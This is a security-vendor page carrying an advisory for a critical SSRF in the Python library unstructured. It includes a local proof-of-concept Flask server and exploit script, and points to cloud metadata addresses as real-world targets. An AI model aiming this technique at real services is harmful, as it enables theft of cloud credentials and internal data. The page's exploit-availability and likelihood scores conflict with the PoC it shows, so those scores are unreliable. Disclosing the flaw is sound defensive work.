Open-Source Security Intelligence

Know every vulnerability
before it knows you.

DevGuard continuously monitors your dependencies and alerts you when CVEs like this one affect your stack — with real-time threat intelligence built for developers.

Search

GHSA-4mvj-m6j5-pmf7

CriticalCVSS 9.3 / 10
Published Sep 3, 2026·Last modified Sep 3, 2026
Affected Components(1)
PyPI logounstructured
0.4.7 – 0.24.0
Description

Summary

Server-Side Request Forgery in unstructured. The url= argument of partition(), partition_html(), and partition_md() is fetched via requests.get() with no host validation. The response body is returned as Element text, so this is a full-read SSRF — attackers reach loopback admin APIs, internal HTTP services, and cloud metadata endpoints, and read the response.

unstructured is the de facto URL ingestion layer for LangChain UnstructuredURLLoader, LlamaIndex UnstructuredReader, Chainlit, and many agent frameworks — secure defaults must live in the library, not in every downstream caller.

Details

Three sinks, all in unstructured == 0.22.26 (verified on main at 199f255):

  • unstructured/partition/auto.py:303 — file_and_type_from_url(), reached via partition(url=…).
  • unstructured/partition/html/partition.py:160 — partition_html(url=…). Post-fetch Content-Type check runs after the request hits the target.
  • unstructured/partition/md.py:96 — partition_md(url=…). No timeout (SSRF + slow-loris DoS).

None of is_private, is_loopback, ipaddress, gethostbyname, or allow_redirects appear in any of the three files. Three exploitation paths apply: direct private-IP target; redirect bypass (allow_redirects=True default); DNS rebinding (TOCTOU, closeable only by socket-pinning). Affected since 0.4.7 (Feb 2023) — ~219 releases, no validation ever introduced.

PoC

Local-only. pip install unstructured==0.22.26 flask requests.

internal_server.py:

from flask import Flask, Response, jsonify
app = Flask(__name__)

@app.route("/imds")
def imds(): return jsonify({"AccessKeyId": "ASIA-FAKE", "SecretAccessKey": "FAKE/SECRET"})

@app.route("/internal.html")
def html(): return Response("<html><body><p>SK_LEAK_42</p></body></html>", mimetype="text/html")

@app.route("/redir")
def redir(): return Response("", 302, headers={"Location": "http://127.0.0.1:9999/imds"})

if __name__ == "__main__": app.run(host="127.0.0.1", port=9999)

exploit.py — uses the public top-level API:

# Stub NLP helpers so the offline sandbox skips spaCy model download.
# Does NOT affect the SSRF (which lives in the URL fetcher, before NLP).
import unstructured.nlp.tokenize as _tk, unstructured.partition.text_type as _tt
_tk.sent_tokenize = _tt.sent_tokenize = lambda t: [s for s in (t or "").split(". ") if s]
_tk.word_tokenize = _tt.word_tokenize = lambda t: (t or "").split()
_tk.pos_tag       = _tt.pos_tag       = lambda t: [(w, "NN") for w in (t or "").split()]

from unstructured.partition.auto import partition
L = "http://127.0.0.1:9999"

# A: partition(url=...) leaks internal HTML body
assert "SK_LEAK_42" in "\n".join(str(e) for e in partition(url=f"{L}/internal.html", languages=["eng"]))
# B: redirect bypass reaches simulated IMDS
assert "SecretAccessKey" in "\n".join(str(e) for e in partition(url=f"{L}/redir", languages=["eng"]))
print("PoC OK")

In production the attacker substitutes 169.254.169.254, metadata.google.internal, or any internal address.

Impact

Attacker capabilities:

  • Internal HTTP service read — loopback admin consoles, internal Elasticsearch/Redis/Consul/etcd HTTP fronts, Kubernetes API server, social/internal microservices. This is the most broadly exploitable capability and is unaffected by any cloud-side hardening.
  • Cloud instance metadata access — reads metadata services that respond to unauthenticated GETs: GCP (metadata.google.internal), Azure IMDS, Oracle Cloud, DigitalOcean, and EC2 instances still configured for IMDSv1 (which remains widely deployed in older accounts and in services that do not enforce IMDSv2-only). EC2 instances configured as IMDSv2-only are not exposed to direct credential theft via this SSRF, since IMDSv2 requires a PUT for token acquisition; the SSRF still reaches the endpoint for reconnaissance and surface-mapping.
  • Side-effecting GET endpoints — magic-link consumers, job triggers, link-preview generators reachable on internal networks.
  • Internal network reconnaissance — connection success/failure timing and error messages serve as a port and service scanner.
Upload your SBOM

Upload your own SBOM in CycloneDX 1.6 or higher (JSON) directly here to check your vulnerabilities.

Risk Scores
Base Score
9.3

The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability. The vulnerability can affect other systems as well, not just the initial system. There is a high impact on the confidentiality of the information. There is a low impact on the integrity of the data.

Threat Intelligence
8.5

Exploitation activity has been observed. Apply available patches or mitigations urgently.

EPSS
0.44%

The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.

Exploit
Not available

We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.

Scan your project

Continuously monitor your dependencies and get alerted when vulnerabilities like this one affect your stack.

Checkout DevGuard